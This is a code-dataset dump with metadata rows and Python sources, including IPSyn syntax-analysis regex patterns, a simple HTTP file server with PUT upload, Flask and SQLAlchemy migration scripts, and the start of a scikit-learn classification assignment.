blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e0a8665cf9424448e8382bfa43878fee2adaea9c
|
893f8236a63752f3f5ec8222fc334c73c0a05208
|
/AC-IPSyn/source/Patterns_IPSyn.py
|
3120dd2f8cc76c77000f15df008e06bc093c0db6
|
[] |
no_license
|
haewon-mit/Syntax-Analysis
|
0567e901fd61d244442779362f78ee9c391101d8
|
75f766e7817f6be3ff700d31946ace8c6e8c38af
|
refs/heads/master
| 2021-01-20T20:10:48.952924
| 2016-06-08T16:17:57
| 2016-06-08T16:17:57
| 60,710,511
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,181
|
py
|
#Purpose: This contains the regular expression patterns that will be used for
# extracting the constructs for the IPSyn structure.
Patterns={
#Proper,Mass or Count Noun
'N1':r'(\((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Pronoun or prolocative excluding modifiers
'N2':r'(\((((PRP|WP) ([^)]*))|([W]?RB ([hH]ere|[Tt]here|[Ww]here|[Tt]hereafter|[Hh]ereafter|[Th]ereupon|[Hh]ereabouts|[Ww]hereabouts|[Ww]hereupon|[Tt]hereabouts|[Ss]omewhere|[Ee]verywhere)))\))',
#Modifier including adjectives, possessives and quantifiers
'N3':r'(\((DT|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ((?![Aa]\))(?![Aa]n\))(?![Tt]he\))[^)]+)\))',
#Two word NP: nominal preceded by article or modifier
'N4':r'(\((DT|RP|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ([^)]*)\) \((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Article used before a noun
'N5':r'(\((DT) (([Aa])|([Aa]n)|([Tt]he))\) \((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Two word NP(as in N4) after verb or preposition
'N6':r'(\((AUX|VB|VBD|VBG|VBN|VBP|VBZ|MD|(?<=\(PP \()IN|TO) ([^)]*)\)[ )]*(\((NP|ADJP) )+\((DT|RP|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ([^)]*)\) \((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Plural Suffix (should end with s) - not looking for irregular plurals
'N7':r'(\((NNS|NNPS) ([^)]+s)\))',
#Two-word NP(as in N4) before verb
'N8':r'(\((DT|RP|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ([^)]*)\) \((NNS|NNPS|NN|NNP) ([^)]*)\))([ )]*)\((VP)? \((AUX|VB|VBD|VBG|VBN|VBP|VBZ|MD) ([^)]*)\)',
#Three word NP (Det-Mod-N or Mod-Mod-N)
'N9':r'(\(((PRP\$)|(WP\$)|(JJ)|(JJR)|(JJS)|(CD)|(POS)|(DT)) ([^)]*)\) \(((PRP\$)|(WP\$)|(JJ)|(JJR)|(JJS)|(CD)|(POS)) ([^)]*)\) \(((NNS)|(NNPS)|(NN)|(NNP)) ([^)]*)\))',
#Adverb modifying adjective or nominal
'N10':r'(((\(RB (?![Nn]ot\))(?![Nn]\'t\))([^)]+)\))([ )]*)(\(((NP)|(ADJP)) )?\((NN|NNS|NNP|NNPS|JJ|JJR|JJS|PRP|CD|DT|WP) ([^()]+)\))|(\((NN|NNS|NNP|NNPS|JJ|JJR|JJS|PRP|CD|WP) [^()]+\) \(RB ([^()]+)\))|(\(NP \(PDT ([^()]+)\)))',
#Other bound morphemes on Nouns or adjectives(not stored as a lexical unit)
'N11':r'(\((JJR|JJS|JJ) ((?!([Bb]etter)|([Oo]ther)|([Ss]uper)|([Bb]est)|([Ss]ister)|([Oo]ver)|([Uu]nder))(([Uu]n)?[^()]+((er)|(est)|(ies)|(ish)))|(([Uu]n)[^()]+((er)|(est)|(ies)|(ish))?))\))',
#Other not used
'N12':'',
#Verb
'V1':r'(\((AUX|VB|VBD|VBG|VBN|VBP|VBZ) ([^)]*)\))',
#Particle or preposition
#((?<=\(PP \()IN(?= [^)]+\) \(S))|
'V2':r'(\(((RP)|((?<=\(PP \()((IN)|(TO))(?= [^)]+\) \())|((?<=\(PP \()((IN)|(TO))(?! ([^)]+)\) \(S))) ([^)]*)\))',
#Prepositional Phrase (Prep + NP)
'V3':r'(\PP \(((IN)|(TO)) ([^)]*)([ )]*)\(NP( \(([A-Z$]+) ([^)]*)\))+)',
#Copula linking two nominals
#NP VP NP or NP VP ADJP
'V4':r'((( [Ii\']s\))|( [Aa]re\))|( [Aa]m\))|( [Bb]e\))|( [Ww]ere\))|( [Bb]een\))|( [Bb]eing\))|( [Ww]as\))|( [Bb]ec[oa]me)|( [Bb]ecoming\))|( [Ss]eem))|(\(((NP)|(WHNP))( (\([A-Z$]+ ([^()]+)\))+)\) (\(VP ([A-Z]+ [^()]+)+? )?\((VP|SQ) \((AUX|VB|VBZ|VBG|VBN|VBD|VBP) ([^()]+)\) (\(RB [^()]+\) )?\(ADJP( \([A-Z$]+ ([^()]+)\))+\)))',
#Catenative(pseudo-auxiliary) preceeding a verb
'V5':r'((gonna)|(hafta)|(wann?t?a)|(s\'pposedt?a))\)+ +\(VP \(((VB)|(AUX)) [^()]+\)',
#Auxilary do,is,have in VP
'V6':r'(\(AUX (([dD](o|id|oing|ne))|([Bb]i(een|e|eing))|([Ii\']s)|([Aa\'](m|re))|([Ww](as|ere))|([Hh]a(d|s|ve|ving))))',
#Progressive suffix
'V7':r'(\(VP \((VBG) ([^()]+ing)\))',
#Adverb
'V8':r'(\(((RB)|(WRB|NP \(PDT)) ([^)]*)\))',
#Modal preceeding verb
'V9':r'((\(VP \(MD ([^()]+)\) (\(RB [^()]+\) )?\(VP( \((\w+) ([^)]+)\))+\))|(\(SQ \(MD ([^ ()]+)\)( \(RB [^()]+\))?( \((\w+) ([^)]*)\))+\) \(VP( \((\w+) ([^)]*)\))+\)))',
#Third person singular present tense suffix
'V10':r'((\(VBZ ([^)]*)\))|(\(AUX (?![\']?s\))([^)]*s)\)))',
#Past tense modal
#Check for the list of all the modals in the PENN Tree bank
'V11':r'(\(MD ((?i)((could)|(would)|(should)|(might)|(must)|(need)|(ought)|(dared)|(\'ll)))\))',
#Regular past tense prefix
'V12':r'(\(VP \(VB[DN] ([^)]+ed)\))',
#Past tense auxiliary - only looking for Did, Was, Had
#Check the PENN Tree bank for the entire list
#Regular past tense ends with ed except for the irregular verbs
#Need to get a list of the irregular verbs
'V13':r'(\(AUX ((([Dd]id)|([Ww]as)|([Ww]ere)|([Hh]ad)|(\'d))|([^)]*[^e]ed))\))',
#Medial adverb
'V14':r'\n?.*?(\([A-Z$]+ [^()]+\).*?(W?RB|\(NP \(PDT) (?!not)([^()]+)(.*?\([A-Z$]+ [^()]+\)).*\n?)',
#Copula,Modula or Auxiliary for emphasis or ellipsis
#Look at this later
#Common - Yes - positive forms of the modal (no not present after modal)
# No - negative form of the modal present(not or n't present after modal/aux)
#Need to look at Copula verbs for ellipsis
'V15':r'(((\(RB [Yy]es\)) |(\((DT [Nn]o)\))).*?(\((MD|AUX) ([^)]*)\)))',
#Past tense copula
#Check for past tense auxiliaries?
'V16':r'((( [Ww]ere\))|( [Bb]een\))|( [Ww]as\))|( [Bb]ecame)|( [Ss]eemed))|(\(((NP)|(WHNP))( (\([A-Z$]+ ([^()]+)\))+)\) (\(VP ([A-Z]+ [^()]+)+? )?\((VP|SQ) \((VBD) ([^()]+)\) (\(RB [^()]+\) )?\(ADJP( \([A-Z$]+ ([^()]+)\))+\)))',
#r'(\((NP|WHNP)( (\((\w+) ([^)]+)\))+)\) \((VP|SQ) \(((AUX (([Dd]id)|([Ww]as)|([Hh]ad)|(\'d))|([^)]*[^e]ed))|(VBD ([^)]+)))\) \((ADJP|NP)( \((\w+) ([^)]+)\))+\))',
#Bound morpheme on a verb or adjective(to make an adverb)
#Need to get all the possible rules that go with this
'V17':r'\(((VB[^G]?)|(RB)) ((((?![Rr]emember)(?![Ii]nside)(?![Rr]ecord)(([Rr]e)|([Ii]n)|([Ee]n)|([uU]n)|([Mm]is)|([Tt]rans)|([eE]x)|([Dd]is))([^ ()]+))|((?![Oo]nly)([^ ()]+)(ly))))\)',
#r'\((VB|RB|VBZ|VBG|VBD|VBN|VBP|AUX|RB) (((un|re)(\w+)(ly)?)|((\w+)(ly))\))',
#Intonationally marked question
'Q1':r'((\(S. \((FRAG|NP|(S \(VP)).*(\. \?))+?)',
# Routine do/go or existence name question or wh-pronoun alone.
'Q2':r'((\(S. .*\(((WP(\$)?)|WHNP|WHADP|WHAVP|WHPP) [^)]+\).*(\. \?))+?)',
#(Simple Negation +X ) neg=no(t), can't don't X=NP,PP,VP,Adj, Adv etc
'Q3':r'((\(S..*\((RB|DT) ([Nn](o|ot|\'t|ever))\).*\(\. [?.!]\))+?)',
#Initial Wh-pronoun followed by verb
'Q4':r'((\(S. (\(([A-Z$]+ ))+(\(WP(\$)? ([^)]+)\))[ )]*(\(([A-Z$]+ ))*\((AUX|VB|VBD|VBP|VBN|VBG|VBZ|MD).*(\. \?))+?)',
#Negative Morpheme between subject and verb
'Q5':r'((\(S. (\(S \(NP.*(\(VP(\)| )+((\(((AUX)|(MD)) [^)]+\))? \(RB ((\'nt)|(not)|(n\'t))\) \(VP).*))\(\. [!.?]\))+?)',
#Wh-question with inverted modal, copula or auxillary
'Q6':r'((\(S. \(SBARQ.*\(SQ.*(\. \?))+?)',
#Negation of copula, modal or auxiliary
'Q7':r'(\(S1.*(\(VP \(((AUX)|(MD)) [^)]+\) (\(ADVP )?\(RB ((not)|(n\'t)|(\'nt)|(never))\)(.*))\(\. [.!?]\))+?',
#r'((\(S. .*\(((AUX)|(MD)) [^)]+\) \(RB ((not)|(n\'t)).*(\. \?))+?)',
#Yes/no question with inverted modal, copula or auxiliary
'Q8':r'((\(S. \(SQ.*(\. \?))+?)',
#Why, When, Which, Whose
'Q9':r'((\(S. (\(([A-Z$]+ ))+([Ww](hy|hen|hich|hose)).*(\. \?))+?)',
# Tag Question
'Q10':r'(\(S1((?!( \(S((Q)|(BARQ)))).*) \(, ,\) (.*)\(\. \?\))+?',
#Other: e.g questions with negation and inverted cop/aux/modal
'Q11':r'((\(S. .*\(((SBARQ)|((SQ)?)|(S)|(SINV)) (?!\(NP).*\((SQ ).*(\(((AUX)|(MD)) [^)]+\) \(RB ((not)|(n\'t))).*(\. \?\)))+?)',
# Two word combination
'S1':r'((\(S..*\(\. [.!?]\))+?)',
# Subject verb sequence
'S2':r'(\n?.*?\(S ((\(NP [^\n]*\(VP.*\n?)))',
# Verb object sequence
'S3':r'(\n?.*?(\(VP.*?\(NP.*\n?))',
# Subject Verb Object Sequence
'S4':r'(\n?.*?\(S ((\(NP [^\n]*\(VP.*?\(NP.*\n?)))',
# Conjunction(any)
#'S5':r'(S. .*((\(CC)|((?<!\(PP )\(IN(?= ([^)]+)\) \(S))) ([^)]+)\).*\(\. [!?.]\))+?',
'S5':r'(S. .*((((\(CC)|((?<!\(PP )\(IN(?= ([^)]+)\) \(S))) ([^)]+)\))|(\(CONJP( \([A-Z$1-9]+ [^)]+\))+\))).*\(\. [!?.]\))+?',
# Sentence with two VP's
'S6':r'((\(S. .*(.*(\((VB|VBZ|VBP|VBN|VBD) ([^)]+)\).*?){2,}.*)\(\. [.!?]\))+?)',
# Conjoined phrases
'S7':r'((\(S. .*?\([A-Z]+ (\((?P<i>[A-Z]{2,})[A-Z$]? [^)(]+\)(( \(CC [^)]+\) \((?P=i).{,2} [^()]+\)))+)\)?.*\(\. [.!?]\))+?)',
# Infinitive without catenative marked with to
'S8':r'((S. .*(\(VP.*?(?=\((VB[GPNZD]?)|(AUX) ).*?\(VP.*?TO.*(?=\(VP.*?\(((VB)|(AUX)) ).*\(\. [!?.]\)))+?)',
# Let/Make/Help/Watch introducer
'S9':r'((\(S. (\([A-Z$1-9]+ )+(\(((RB)|(UH)) [^()]+\)+ )?\(VP \(VB (([Ll]et)|([Hh]elp)|([Mm]ake))\).*\((VB|VBD|VBZ|VBN|VBP|VBG|AUX).*\(\. [.?!]\))+?)',
# Adverbial Conjunction
'S10':r'(S. .*((((\(CC)|((?<!\(PP )\(IN(?= ([^()]+)\) \(S))) ([^()]+)\))|(\(CONJP( \([A-Z$1-9]+ [^()]+\))+\))).*\(\. [!?.]\))+?',
# Propositional Complement
# Need to get a list of words
'S11':r'(\(S1.*\(VP \(VB.? ((mean)|(forget)|(forgot)|(say)|(said)|(tell)|(told)|(guess)|(know)|(knew)|(remember)|(wonder)|(judj)|(use)|(using)|(show)|(think)|(thought))[^()]*\) (\(SBAR ((\([A-Z]+ )+\([A-Z$]+ [^()]+\)\) )?\(S \(NP.*)\(\. [.!?]\))+?',
# Conjoined sentences (Except for imperatives, will usually have subj + predicate in each clause)
#Left to consider Wh conjunctives - right now have considered CC and IN conjunctives
'S12':r'(S. (((?=\(((S)|(SBAR)|(SBARQ)|(SINV)|(SQ)|(VP)) )(.*)(((?<=\){2} )\(CC)|((?<!\(PP )\(((S)|(SBAR)|(SBARQ)|(SINV)|(SQ)|(VP)) IN(?= ([^)]+)\) \(S))) [^)]+\) (\((S|SBAR|SBARQ|SINV|VP) .*))+)\(\. [.!?]\))+?',
# Wh-clause
'S13':r'((\(S. .*\(((SBAR(Q)?)|SINV|SQ|S) \(((WHNP)|(WHADJP)|(WHADVP)|(WHPP)).*\(\. [.!?]\))+?)',
# Bitransitive predicate
'S14':r'(\(S1.*(\(VP (\(VB[GDPNZ]? [^()]+\))+\)* *\(NP (\([A-Z]+ [^()]+\))+\) *?(\(PP \(((IN)|(TO)) ((to)|(for))]+\) )?\(NP \((?!RB)[A-Z]+ (?!(tonight)|(tomorrow)|(today))[^()]+\)( \([A-Z]+ [^()]+\))*\)* *?.*)\(\. [.!?]\))+?',
# Sentence with three or more VPs
'S15':r'((\(S..*(.*(\((VB|VBZ|VBP|VBN|VBD|AUX) ([^)]+)\).*){3,}.*)\(\. [.!?]\))+?)',
# Relative clause marked or unmarked
'S16':r'(\(S1 .*?(\(NP .*?(\(SBAR (?!\(IN ).*?\(S .*))+\(\. [?.!]\)+)+?',
# Infinitive clause new subject
'S17':r'(\(S1.*\(VP( \((?!VBG)[A-Z]+ [^()]+\))+( (\(S )\(NP( \([A-Z$]+ [^()]+\))+\)+ *\(VP \(TO to\) \(VP \(((VB)|(AUX)) [^()]+\).*)\(\. [?!.]\))+?',
# Gerund
'S18':r'((\(.*\(VBG.*\(\. [.!?]\))+?)',
# Fronted or center-embedded subordinate clause
'S19':r'((\(.*?(\(SBAR (\(IN [^)]+\) )?\(S.*)\(\. [?.!]\)+)+?)',
# Other: e.g passive constructions e.g tag comments/intrusions
'S20':r''
}
Nouns=["N1","N2","N3","N4","N5","N6","N7","N8","N9","N10","N11","N12"]
Verbs=["V1","V2","V3","V4","V5","V6","V7","V8","V9","V10","V11","V12","V13","V14","V15","V16","V17"]
Questions=["Q1","Q2","Q3","Q4","Q5","Q6","Q7","Q8","Q9","Q10","Q11"]
Sentences=["S1","S2","S3","S4","S5","S6","S7","S8","S9","S10","S11","S12","S13","S14","S15","S16","S17","S18","S19","S20"]
Description={
'N1':"Proper Mass or Count Noun",
'N2':"Pronoun,Prolocative excluding modifiers",
'N3':"Modifier including adjectives, possessives and quantifiers",
'N4':"Two word NP preceded by article or modifier",
'N5':"Article used before a noun",
'N6':"Two word NP(as in N4) after verb or preposition",
'N7':"Plural suffix",
'N8':"Two word NP (as in N4 before verb)",
'N9':"Three word NP (Det-Mod-N or Mod-Mod-N)",
'N10':"Adverb modifying adjective or nominal",
'N11':"Any other bound morpheme on N or adjective(if judged not to be stored as lexical unit",
'N12':"Others",
'V1':"Verb",
'V2':"Particle or preposition",
'V3':"Prepositional Phrase (Prep+NP)",
'V4':"Copula linking two nominals (nominal + copula + nominal, copula)",
'V5':"Catenative (pseudo-auxiliary) preceeding a verb (catenative,verb)",
'V6':"Auxiliary be, do, have in VP",
'V7':"Progressive Suffix",
'V8':"Adverb",
'V9':"Modal preceeding verb",
'V10':"Third person singular present tense suffix",
'V11':"Past tense modal",
'V12':"Regular past tense suffix",
'V13':"Past tense auxiliary",
'V14':"Medial adverb",
'V15':"Copula, Modal or Auxiliary used for emphasis or ellipsis(uncontractible context)",
'V16':"Past tense copula",
'V17':"Bound morpheme on a verb or an adjective(to make an adverb)",
'Q1':"Intonationally marked question",
'Q2':"Routine do/go existence name question or wh-pronoun alone",
'Q3':"Simple Negation +X ) neg=no(t), can't don't X=NP,PP,VP,Adj, Adv etc",
'Q4':"Initial Wh-pronoun followed by verb",
'Q5':"Negative Morpheme between subject and verb",
'Q6':"Wh-question with inverted modal, copula or auxillary",
'Q7':"Negation of copula, modal or auxiliary",
'Q8':"Yes/no question with inverted modal, copula or auxiliary",
'Q9':"Why, When, Which, Whose",
'Q10':"Tag Question",
'Q11':"Other: e.g questions with negation and inverted cop/aux/modal",
'S1':"Two word combination",
'S2':"Subject verb sequence",
'S3':"Verb object sequence",
'S4':"Subject Verb Object Sequence",
'S5':"Conjunction (any)",
'S6':"Sentence with two VP's",
'S7':"Conjoined phrases",
'S8':"Infinitive without catenative, marked with to",
'S9':"Let/Make/Help/Watch introducer",
'S10':"Adverbial Conjunction",
'S11':"Propositional Complement",
'S12':"Conjoined sentences (Except for imperatives, will usually have subj + predicate in each clause)",
'S13':"Wh-clause",
'S14':"Bitransitive predicate",
'S15':"Sentence with three or more VPs",
'S16':"Relative clause marked or unmarked",
'S17':"Infinitive clause new subject",
'S18':"Gerund",
'S19':"Fronted or center-embedded subordinate clause",
'S20':"Other: e.g passive constructions e.g tag comments/intrusions"
}
|
[
"personalrobots@personals-mbp-2.media.mit.edu"
] |
personalrobots@personals-mbp-2.media.mit.edu
|
b7eb0a6c17571f95eecb2d8d0106738004e2c7d0
|
18e9bbc8747f4edca0c96e522bbd6dde48a60966
|
/lang/py/detail/simphttp.py
|
09b6e116f9042b84864db836a4576b3fee95fbb5
|
[] |
no_license
|
leizton/inote
|
6290be44b0fcb4d182c4b031ed95de6bdc736de8
|
c8114b3d46cb14a1bf9d431a765e203685cc3882
|
refs/heads/master
| 2023-08-31T04:22:43.517404
| 2023-08-17T09:37:22
| 2023-08-17T09:37:22
| 111,563,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,867
|
py
|
"""Simple HTTP Server.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
import os
import posixpath
import BaseHTTPServer
import SocketServer
import urllib
import cgi
import sys
import shutil
import mimetypes
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__version__ = "0.6"
class SimpHttpRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Simple HTTP request handler with GET and HEAD commands.
This serves files from the current directory and any of its
subdirectories. The MIME type for files is determined by
calling the .guess_type() method.
The GET and HEAD requests are identical except that the HEAD
request omits the actual contents of the file.
"""
server_version = "SimpleHTTP/" + __version__
def do_PUT(self):
# open
try:
path = self.translate_path(self.path)
out = open(path, 'wb')
except:
out = None
if not out:
self.send_result(500, "open exception")
return
# write
try:
remain = int(self.headers['content-length'])
while remain > 0:
buf = self.rfile.read(min(remain, 1024))
remain -= len(buf)
out.write(buf)
except:
self.send_result(500, "write exception")
return
# close
try:
out.close()
self.send_result(200, "ok")
except:
self.send_result(500, "close exception")
def send_result(self, code, info):
f = StringIO()
f.write(info)
self.send_response(code)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", f.tell())
self.end_headers()
f.seek(0)
self.copyfile(f, self.wfile)
f.close()
def do_GET(self):
"""Serve a GET request."""
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
def do_HEAD(self):
"""Serve a HEAD request."""
f = self.send_head()
if f:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
# Always read in binary mode. Opening files in text mode may cause
# newline translations, making the actual size of the content
# transmitted *less* than the content-length!
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found")
return None
try:
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
except:
f.close()
raise
def list_directory(self, path):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
try:
list = os.listdir(path)
except os.error:
self.send_error(404, "No permission to list directory")
return None
list.sort(key=lambda a: a.lower())
f = StringIO()
displaypath = cgi.escape(urllib.unquote(self.path))
f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
f.write("<hr>\n<ul>\n")
for name in list:
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
f.write('<li><a href="%s">%s</a>\n'
% (urllib.quote(linkname), cgi.escape(displayname)))
f.write("</ul>\n<hr>\n</body>\n</html>\n")
length = f.tell()
f.seek(0)
self.send_response(200)
encoding = sys.getfilesystemencoding()
self.send_header("Content-type", "text/html; charset=%s" % encoding)
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
# Don't forget explicit trailing slash when normalizing. Issue17324
trailing_slash = path.rstrip().endswith('/')
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = os.getcwd()
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir): continue
path = os.path.join(path, word)
if trailing_slash:
path += '/'
return path
def copyfile(self, source, outputfile):
"""Copy all data between two file objects.
The SOURCE argument is a file object open for reading
(or anything with a read() method) and the DESTINATION
argument is a file object open for writing (or
anything with a write() method).
The only reason for overriding this would be to change
the block size or perhaps to replace newlines by CRLF
-- note however that this the default server uses this
to copy binary data as well.
"""
shutil.copyfileobj(source, outputfile)
def guess_type(self, path):
"""Guess the type of a file.
Argument is a PATH (a filename).
Return value is a string of the form type/subtype,
usable for a MIME Content-type header.
The default implementation looks the file's extension
up in the table self.extensions_map, using application/octet-stream
as a default; however it would be permissible (if
slow) to look inside the data to make a better guess.
"""
base, ext = posixpath.splitext(path)
if ext in self.extensions_map:
return self.extensions_map[ext]
ext = ext.lower()
if ext in self.extensions_map:
return self.extensions_map[ext]
else:
return self.extensions_map['']
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
extensions_map = mimetypes.types_map.copy()
extensions_map.update({
'': 'application/octet-stream', # Default
'.py': 'text/plain',
'.c': 'text/plain',
'.h': 'text/plain',
})
# nohup python simphttp.py 8000 &
if __name__ == '__main__':
port = 10000
if len(sys.argv) > 1:
port = int(sys.argv[1])
httpd = SocketServer.TCPServer(("", port), SimpHttpRequestHandler)
print "serving at port:", port
httpd.serve_forever()
|
[
"leizton@126.com"
] |
leizton@126.com
|
401caa772c709306a860945e1a837247a57746a2
|
cd38e69551eb8c205690aa29e21be414d32613b6
|
/manage.py
|
009fcccf4ca0e26a657de5b0ba0ef3ef39e8e1ef
|
[] |
no_license
|
fj-fj-fj/weather-api
|
d779c6b2e5ef917be843cf6aba4d514eb84399d1
|
b364e50e031c3740f9c16139e408d82ac45754df
|
refs/heads/main
| 2023-04-14T03:00:38.418507
| 2021-04-25T11:32:06
| 2021-04-25T11:32:06
| 355,349,080
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
from main import * # noqa: F403, F401
from weather.app import manager
if __name__ == '__main__':
manager.run()
|
[
"berendeyzhiv@gmail.com"
] |
berendeyzhiv@gmail.com
|
4523042c199bfcef8e6db6475c59c6e2502fe508
|
037cf499131b335c8721c75620d835cdcbca63d7
|
/makemigrations.py
|
278ac19d6b905743aa51d89cf6c96df6e8138f14
|
[] |
no_license
|
mihai-dobre/homework
|
35e38028785b485e06e7da704fca4a91563a63f6
|
a550d7044c664e1c56c092f4de3bf0539d069cd3
|
refs/heads/master
| 2021-01-23T04:53:23.602698
| 2017-09-05T17:17:45
| 2017-09-05T17:17:45
| 102,453,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 879
|
py
|
#!/home/mido/.virtualenvs/homework/bin/python
import imp
from migrate.versioning import api
from app import db
from config import SQLALCHEMY_DATABASE_URI
from config import SQLALCHEMY_MIGRATE_REPO
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
migration = SQLALCHEMY_MIGRATE_REPO + ('/versions/%03d_migration.py' % (v+1))
tmp_module = imp.new_module('old_model')
old_model = api.create_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
exec(old_model, tmp_module.__dict__)
script = api.make_update_script_for_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, tmp_module.meta, db.metadata)
open(migration, "wt").write(script)
api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
print('New migration saved as ' + migration)
print('Current database version: ' + str(v))
|
[
"mihai.dobre@cegeka.com"
] |
mihai.dobre@cegeka.com
|
274b4e2ca3abe691d126c2277da8731025cc44ce
|
a18324874df3083fe63430963ac98e0b056b3bab
|
/assignment2/a_classification.py
|
9d65f2438785f76eeb5d5cdc503f300d481e2dc8
|
[] |
no_license
|
noah-sealy-fdl-2021/VisualAnalyticsProjects
|
16a95ce985aaa4c7c4b3fdc4dc2d3d3574b90695
|
f227e13a4b99bc724568316e34f9864aa1e39406
|
refs/heads/main
| 2023-03-18T17:52:50.473708
| 2021-03-13T07:04:31
| 2021-03-13T07:04:31
| 347,287,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,531
|
py
|
from pathlib import Path
from typing import List, Dict
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.tree import DecisionTreeClassifier
from assignments.assignment1.a_load_file import read_dataset
from assignments.assignment1.b_data_profile import get_column_mean
from assignments.assignment1.c_data_cleaning import fix_nans
from assignments.assignment1.d_data_encoding import generate_label_encoder, replace_with_label_encoder, \
generate_one_hot_encoder, replace_with_one_hot_encoder, fix_outliers, fix_nans, normalize_column
from assignments.assignment1.e_experimentation import process_iris_dataset, process_amazon_video_game_dataset_again, \
process_life_expectancy_dataset
"""
Classification is a supervised form of machine learning. It uses labeled data, which is data with an expected
result available, and uses it to train a machine learning model to predict the said result. Classification
focuses in results of the categorical type.
"""
'''
NOTE: I added some print statements to help looking at the functions output for texting
I commented them out as they cause quite a lot of clutter while using them for larger functions
BUT feel free to comment any of the print statements back in while testing if it helps :)
'''
##############################################
# Example(s). Read the comments in the following method(s)
##############################################
def simple_random_forest_classifier(X: pd.DataFrame, y: pd.Series, set: str = None) -> Dict:
"""
Simple method to create and train a random forest classifier
https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html
"""
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)
# If necessary, change the n_estimators, max_depth and max_leaf_nodes in the below method to accelerate the model training,
# but don't forget to comment why you did and any consequences of setting them!
if set == 'Amazon':
model = RandomForestClassifier(n_estimators=5)
else:
model = RandomForestClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test) # Use this line to get the prediction from the model
accuracy = model.score(X_test, y_test)
return dict(model=model, accuracy=accuracy, test_prediction=y_predict)
def simple_random_forest_on_iris() -> Dict:
"""
Here I will run a classification on the iris dataset with random forest
"""
df = pd.read_csv(Path('..', '..', 'iris.csv'))
X, y = df.iloc[:, :4], df.iloc[:, 4]
le = LabelEncoder()
y_encoded = le.fit_transform(y)
rf = simple_random_forest_classifier(X, y_encoded)
print(rf['accuracy'])
return rf
def reusing_code_random_forest_on_iris() -> Dict:
"""
Again I will run a classification on the iris dataset, but reusing
